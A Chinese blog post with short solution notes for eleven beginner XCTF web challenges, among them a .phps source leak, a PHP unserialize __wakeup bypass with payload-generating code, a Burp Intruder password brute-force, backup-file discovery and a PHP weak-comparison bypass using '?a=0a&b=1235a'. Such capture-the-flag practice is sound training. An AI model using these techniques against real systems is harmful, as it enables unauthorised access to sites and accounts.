-
XCTF刷题十一道(01)
Training-WWW-Robots
robots.txt,防爬虫,访问url+robots.txt
PHP2
phps源码泄露
>`phps`文件就是`php`的源代码文件,通常用于提供给用户(访问者)查看`php`代码,因为用户无法直接通过浏览器看到`php`文件内容,所以需要用`phps`文件代替。 >它的MIME类型为:text/html, application/x-httpd-php-source, application/x-httpd-php3-source。- 1
- 2
admin二次url编码传入id参数
unserialize3
class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code=- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
<?php class xctf{ public $flag = ''; public function __wakeup(){ exit('bad requests'); } } $a = new xctf; echo urlencode(serialize($a));- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
更改对象个数
view-source
ctrl+u查看源码
get_post
robots
backup
访问index.php.bak文件
index备份文件cookie
disabled_button
右键按钮点检查,或者ctrl+shift+c选中也可以
删掉,再点按钮
weak_auth
burp抓包,放intruder,用户名admin,密码位置添加变量
密码找个字典添加进去
123456simple_php
<?php show_source(__FILE__); include("config.php"); $a=@$_GET['a']; $b=@$_GET['b']; if($a==0 and $a){ //弱比较,不同类型比较会发生强制类型转换,截断 echo $flag1; } if(is_numeric($b)){ //任意字母+数字组合,is_numeric无法识别 exit(); } if($b>1234){ //1235a>1234,截断比较 echo $flag2; } ?>- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
?a=0a&b=1235a
-
相关阅读:
python画图
关于基尔霍夫定律拓扑小知识
ModStart 中HasAdminQuickCRUD 的功能使用解析
Docker Swarm实现容器的复制均衡及动态管理:详细过程版
【前端寻宝之路】学习和总结CSS的字体属性设置
第三章 内存管理 一、内存的基础知识
多线程的相关知识
WebAssembly — 概览
一图get招商局客户经营管理模式转型新成果
MyBatis源码之MyBatis中SQL语句执行过程
- 原文地址:https://blog.csdn.net/qq_45837896/article/details/134271620
